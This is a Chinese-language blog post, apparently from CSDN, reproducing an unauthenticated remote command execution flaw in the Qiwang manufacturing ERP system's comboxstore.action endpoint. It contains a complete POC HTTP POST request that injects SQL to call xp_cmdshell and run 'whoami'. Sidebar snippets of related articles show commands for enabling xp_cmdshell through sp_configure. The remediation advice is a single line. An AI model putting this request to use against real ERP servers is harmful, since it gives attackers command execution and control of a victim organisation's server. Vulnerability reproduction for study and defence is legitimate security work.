企望制造ERP系统 RCE漏洞复现

最新推荐文章于 2024-08-28 18:14:08 发布
最新推荐文章于 2024-08-28 18:14:08 发布
阅读量329 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 制造 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/132298704
版权

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
 

简介

        企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。本款erp系统适合用在纸箱厂、纸板厂、蜂窝、纸护角等企业中。

漏洞概述

        由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。 

漏洞利用 

漏洞利用

http://xxxxxxxx/mainFunctions/comboxstore.action

出现下图内容,即可验证漏洞存在

POC

POST /mainFunctions/comboxstore.action HTTP/1.1
Host: xxxxxxxxxxx
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=BBA11699143D001D28C3FBBDC31H0D92
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

comboxsql=exec%20xp_cmdshell%20'whoami'

发送请求包 (之前一直使用burp,这次使使yakit),利用 xp_cmdshell RCE漏洞

查看数据库版本

 修复建议

设置ACL访问控制权限,打相关的补丁。

好久没发表文章了,特殊时期(懂得都懂.....)实在是忙,以后为大家持续分享,欢迎大佬们指出修改意见!!

故事讲予风听
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞复现
0xSec
04-12 396
​睿贝外贸ERP appPatchDownLoad 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
利用xp cmdshell执行系统命令
cxrpty的博客
02-13 3073
一、首先要进入master,这里要用;隔开,有点类似堆叠查询 输入:http://192.168.1.106/1.php?id=1;use master;可看到没什么变化 二、开启高级功能 输入:http://192.168.1.106/1.php?id=1;use master;exec sp_configure 'show advanced options',1;reconfigur...
xp_cmdshell的关闭问题
qq_53297395的博客
05-11 880
通过xp_cmdshell是mssql提权的方法之一,sql 2005版本以后xp_cmdshell是默认关闭的了的。 这个时候需要手动打开,新建查询之后输入如下命令。 EXEC sp_configure 'show advanced options', 1 RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 现在已经启动了,用whoami命令测试一下,有正确回显 EXEC master.dbo.xp_cmdshel
ERP系统存在RCE漏洞
做自己喜欢的事,并将其发挥到极致!
09-14 883
企望制造纸箱行业ERP系统涉及纸箱企业管理的各个方面,包括成本核算、报价定价、订单下达、生产排单、现场管理、成品入库、出货配送、全业务流程财务结算,质量管理贯穿始终,将纸箱企业管理水平提升到一个全新的高度,实现精确计算,合理规划,高效监管,分工合作,充分沟通的管理理念。
漏洞复现企望制造ERP系统 RCE漏洞
失心少年
01-01 1230
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!企望制造ERP系统是畅捷通公司开发的一款领先的生产管理系统,它以集成化管理为核心设计理念,通过模块化机制,帮助企业实现生产、采购、库存等方面的高效管理。使用POC进行复现,抓包进行拦截数据包,修改请求包,使用POC进行漏洞测试。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 806
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
制造企业SRM系统中如何进行供应商的管理
飞迅软件的博客
08-28 520
在SRM系统中,企业需要不断回顾和改进供应商管理流程。通过收集和分析供应商的反馈和建议,企业可以发现管理中的不足之处,并采取相应的改进措施。同时,随着市场环境和企业需求的变化,企业还需要不断优化供应商评估和管理策略,确保供应链的竞争力和适应性。
从中国制造到全球领先,星坤连接器的全球化之路
2401_86367277的博客
08-27 240
从中国制造到全球领先,星坤连接器的全球化之旅并非一帆风顺,但星坤人凭借着坚定的信念、顽强的毅力和不断创新的精神,一步步实现了自己的目标。在未来的发展道路上,星坤连接器将继续秉持“质量第一、客户至上”的经营理念,不断开拓创新,为全球客户提供更加优质的产品和服务,书写更加辉煌的篇章。但星坤连接器的目光并未局限于国内。通过与全球顶尖企业的合作,星坤不仅学习到了先进的管理经验和技术,还提升了自身的品牌影响力。在当今全球化的时代浪潮中,星坤连接器以其卓越的品质和不断创新的精神,开启了一段令人瞩目的全球化之路。
武器弹药制造5G智能工厂物联数字孪生平台,推进制造业数字化转型
kingrab3D的博客
08-28 372
武器弹药制造5G智能工厂物联数字孪生平台,是集多种前沿技术于一体的综合性系统。物联网技术的应用,使得工厂内的各类设备、物料乃至人员都能被实时感知与监控,构建起一个全面互联的生产环境。大数据与云计算技术则负责对海量数据进行处理与分析,为决策提供有力支持。而人工智能的引入,更是让平台具备了自我学习与优化的能力,实现了生产过程的智能化控制。
深圳MES制造管理系统在企业中的应用
xiandazhikong的博客
08-26 499
物料管理:深圳的制造企业通常涉及多种原材料和零部件,MES系统可以帮助企业实现物料的库存管理、物料配送和物料追溯,确保生产过程的物料供应顺畅。生产计划管理:深圳的制造企业通常面临订单量大、交货期紧的情况,MES系统可以帮助企业制定合理的生产计划,优化生产排程,确保按时交付客户订单。制造管理系统在制造企业中的应用范围广泛,可以帮助企业实现生产过程的自动化、信息化和数字化管理,提高生产效率、产品质量和管理水平。可以监控生产过程中的关键参数和指标,实时反馈生产情况,帮助生产人员及时调整生产过程,提高生产效率。
数据资产目录中的主数据划分(汽车制造行业)
最新发布
形而上者谓之道 形而下者谓之器
08-28 821
主数据在制造业中扮演着至关重要的角色,它对于提升效率、降低成本、确保产品质量和优化供应链管理等方面具有深远影响。:准确的主数据为管理层提供了可靠的信息基础,使他们能够做出更明智的决策,如产品定价、库存管理、生产计划和供应链策略。:主数据确保了整个企业中关于产品、客户、供应商、物料等信息的一致性。这有助于减少数据错误和重复,提高数据质量。
三品船舶PLM解决方案详情 三品PLM软件在船舶制造行业应用优势
sanpinsoftPLM的博客
08-26 643
三品PLM作为国内领先的PLM提供商,致力于推动船舶制造企业的数字化转型,通过优化设计流程、提升设计效率以及加强供应链管理,为企业带来显著的业务增长和市场竞争力提升。PLM系统提供完善的变更管理功能,记录和审批变更请求,确保变更的正确实施和追溯。三品PLM将设计、工艺、生产、销售、售后服务等各个环节的数据和流程进行整合,打破部门间的信息孤岛,实现信息的共享和协同。PLM系统通过集成设计工具、BOM管理、变更控制等功能,简化船舶设计流程,确保设计过程的准确性和一致性,提高设计效率。
先进制造aps专题二十五 openai的ai大模型设计也使用了aps用的并行遗传算法
lijianhua1205的专栏,微信号 lijianhua1205
08-26 361
做法基本就是,先搞一个初始的算子设计,比如几层,每层多少参数,然后准备一个小规模的训练集,比如100g的训练集,和对应的测试集,先对初始算子的算法模型用100g的小规模训练集训练,测试集得分60分,然后对每个算子,用并行遗传算法搜素,对搜索出来的新算子的算法模型用100g的小规模训练集训练,测试集得分65分,这样反复的优化搜索,最后得到一个测试集得分最高的最优的算子。再对这个最优算子的算法模型,用15t 的大数据集训练,得到正式发布的模型(gpt3,gpt3.5,gpt4,gpt5)
航空制造领域中三维工艺技术的应用
m516387177的博客
08-28 738
三维工艺电子数据包(指令)成为生产现场工作的技术依据,通过工艺设计平台与生产管理系统的集成,将三维工艺指令等工艺数据信息发放到车间生产现场,并以三维的、动态的、交互式的定制界面展示、描述工艺过程,将生产工艺、人员、设备、工装及工具等资源信息有效集成,通过直观的界面显示产品的设计结构关系、工艺结构关系和几何模型,显示工艺仿真过程和工装使用定位方法,显示与仿真过程相应的操作说明等,使工人按指令进行操作,准确快速地查阅工艺过程中需要的信息,提高工作的准确性和效率。本文是对航空制造领域中三维工艺技术的应用的介绍。
安达发|户外设备制造APS排程的多层级BOM订单拉动
andafa的博客
08-28 468
随后,根据成品组装工序的物料需求,逐级向前拉动半成品、零部件和原材料的生产和供应。由于户外活动的多样性和消费者需求的个性化,该行业的产品类型丰富,从基础的露营帐篷、背包到专业的攀岩器材、徒步鞋等应有尽有。每个层级对应不同的生产阶段和物料需求。户外设备制造业通过实施APS排程的多层级BOM订单拉动策略,不仅能提升生产效率、降低库存成本,还能更好地满足市场定制化需求,从而在激烈的市场竞争中脱颖而出。- 提高生产效率:通过精确的BOM管理和订单拉动策略,减少生产过程中的等待和浪费,提高生产线的运行效率。
计量校准企业的生产制造,具备什么实际的作用?
2401_83476848的博客
08-28 327
计量校准行业已经发展了几十年,从建国后成立的计量所,建立了计量规范,到如今百花齐放,各类机构不断涌出,可供企业选择的计量机构可谓是越来越多,那么实际意义上,计量校准企业的生产制造,具备什么实际的作用?测量仪器的校准与各行各业的产品质量息息相关,准确的生产仪器的产品质量起着重要的作用,如果在生产仪器的生产中存在大量的误差容易出现不良产品,也有很多不合格产品,给企业带来不可估量的损失。为满足管理体系对仪器计量校准的要求,不进行仪器计量校准的企业容易出现产品质量问题,造成较大的经济损失。
SAP与生产制造MPM系统集成案例
集信通
08-27 614
某公司为保证企业内部生产管理系统的多项基础数据的同步更新,确保各模块间信息的一致性和准确性,对后续的生产计划和物料管理打下基础,该公司将MPM系统和SAP系统经过SAP PO中间件集成平台进行了集成。MPM全称为Manufacturing Process Management(制造过程管理)是指在制造业中,对生产过程从原材料投入到成品产出的整个序列进行系统规划、组织、协调与控制的管理活动。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值